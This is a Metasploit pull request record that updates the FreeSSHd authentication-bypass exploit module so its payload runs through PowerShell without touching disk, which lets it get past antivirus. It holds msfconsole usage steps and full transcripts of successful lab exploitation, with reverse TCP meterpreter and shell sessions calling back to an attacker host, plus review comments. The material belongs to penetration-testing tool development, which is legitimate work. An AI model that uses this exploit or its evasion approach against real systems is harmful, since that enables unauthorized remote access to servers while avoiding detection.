### PR TITLE
Add documentation and some enhancement to freesshd_authbypass module

### PR DESCRIPTION
**Pull request by ide0x90**
The `freesshd_authbypass` module was using a CmdStager that wrote the payload to disk then executed it. This was causing the exploit to fail on systems where there was an antivirus present. The use of the Powershell mixin to execute the payload removed the need to write the payload to disk so it would go past antiviruses.

There was no check being carried out at the start of the `exploit` method either, so I included a basic one.

## Verification

- [x] Start msfconsole
- [x] Do : `use exploit/windows/ssh/freesshd_authbypass`
- [x] Do : `set RHOST [target IP]`
- [x] Do : `set PAYLOAD [valid windows payload]` if you want to use other payloads (x86 `meterpreter` by default)
- [x] Do : `set LHOST [Your IP]`
- [x] Do : `set LPORT [valid port]` (`4444` by default)
- [x] Do : `exploit`
- [x] If target is vulnerable, a shell (`meterpreter` by default) should pop

## Example with default payload (windows/meterpreter/reverse_tcp)
```
msf > use exploit/windows/ssh/freesshd_authbypass
msf exploit(windows/ssh/freesshd_authbypass) > set RHOST 192.168.80.131
RHOST => 192.168.80.131
msf exploit(windows/ssh/freesshd_authbypass) > set LHOST 192.168.80.138
LHOST => 192.168.80.138
msf exploit(windows/ssh/freesshd_authbypass) > exploit

[*] Started reverse TCP handler on 192.168.80.138:4444 
[*] 192.168.80.131:22 - Trying username '4Dgifts'
[*] 192.168.80.131:22 - Trying username 'EZsetup'
[*] 192.168.80.131:22 - Trying username 'OutOfBox'
[*] 192.168.80.131:22 - Trying username 'ROOT'
[*] Sending stage (179779 bytes) to 192.168.80.131
[*] Meterpreter session 2 opened (192.168.80.138:4444 -> 192.168.80.131:49166) at 2018-11-16 16:10:33 +0800

meterpreter > sysinfo
Computer        : SSH-TEST-SERVER
OS              : Windows 8.1 (Build 9600).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > 

```

## Example with plain old reverse shell (windows/shell_reverse_tcp)
```
msf > use exploit/windows/ssh/freesshd_authbypass
msf exploit(windows/ssh/freesshd_authbypass) > set RHOST 192.168.80.131
RHOST => 192.168.80.131
msf exploit(windows/ssh/freesshd_authbypass) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(windows/ssh/freesshd_authbypass) > set LHOST 192.168.80.138
LHOST => 192.168.80.138
msf exploit(windows/ssh/freesshd_authbypass) > set LPORT 4444
LPORT => 4444
msf exploit(windows/ssh/freesshd_authbypass) > exploit

[*] Started reverse TCP handler on 192.168.80.138:4444 
[*] 192.168.80.131:22 - Trying username '4Dgifts'
[*] 192.168.80.131:22 - Trying username 'EZsetup'
[*] 192.168.80.131:22 - Trying username 'OutOfBox'
[*] 192.168.80.131:22 - Trying username 'ROOT'
[*] Command shell session 1 opened (192.168.80.138:4444 -> 192.168.80.131:49167) at 2018-11-16 16:12:19 +0800



C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : localdomain
   Link-local IPv6 Address . . . . . : fe80::5d22:f345:9ea1:a320%3
   IPv4 Address. . . . . . . . . . . : 192.168.80.131
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 

Tunnel adapter isatap.localdomain:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : localdomain

C:\Windows\system32>hostname
hostname
SSH-TEST-SERVER

C:\Windows\system32>
```

## TODO

- [x] Add PowerShell as a separate target then set it as default

### CODE REVIEW

File: documentation/modules/exploit/windows/ssh/freesshd_authbypass.md [hunk 1]
```diff
@@ -0,0 +1,92 @@
...
+
+This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass authentication. You just need the username (which defaults to root). The exploit has been tested with both password and public key authentication.
+
+
+## Verification
+
+  1. Start msfconsole
+  2. Do : `use exploit/windows/ssh/freesshd_authbypass`
+  3. Do : `set RHOST [target IP]`
+  5. Do : `set PAYLOAD [valid windows payload]` if you want to use other payloads (`windows/meterpreter/reverse_tcp` by default)
```
Comment (bcoles) [inline documentation/modules/exploit/windows/ssh/freesshd_authbypass.md]: https://www.youtube.com/watch?v=VOaZbaPzdsk

Comment (Psi0NYX) [reply documentation/modules/exploit/windows/ssh/freesshd_authbypass.md]: I have no excuse but sleeplessness and coffee highs.

**Comment by bwatters-r7** [comment]
The sanity test failures are a temporary infrastructure issue on our side.  The Travis failures look like some msftidy issues.  You can check them here, but I recommend running msftidy locally before pushing.  msftidy is in the metasploit-framework/tools directory:
```
tmoose@ubuntu:~/rapid7/metasploit-framework$ tools/dev/msftidy.rb 
Usage: msftidy.rb <directory or file>
```
While you are at it, it might be useful to check out the output from rubocop: https://github.com/rapid7/metasploit-framework/wiki/Using-Rubocop

**Comment by bcoles** [comment]
Jenkins test this please

**Comment by busterb** [comment]
LGTM, thanks!

**Comment by busterb** [comment]
## Release Notes 

This updates the freesshd_authbypass module to work more reliably in the presense of antivirus by avoiding writes to disk.

**Pull request merged**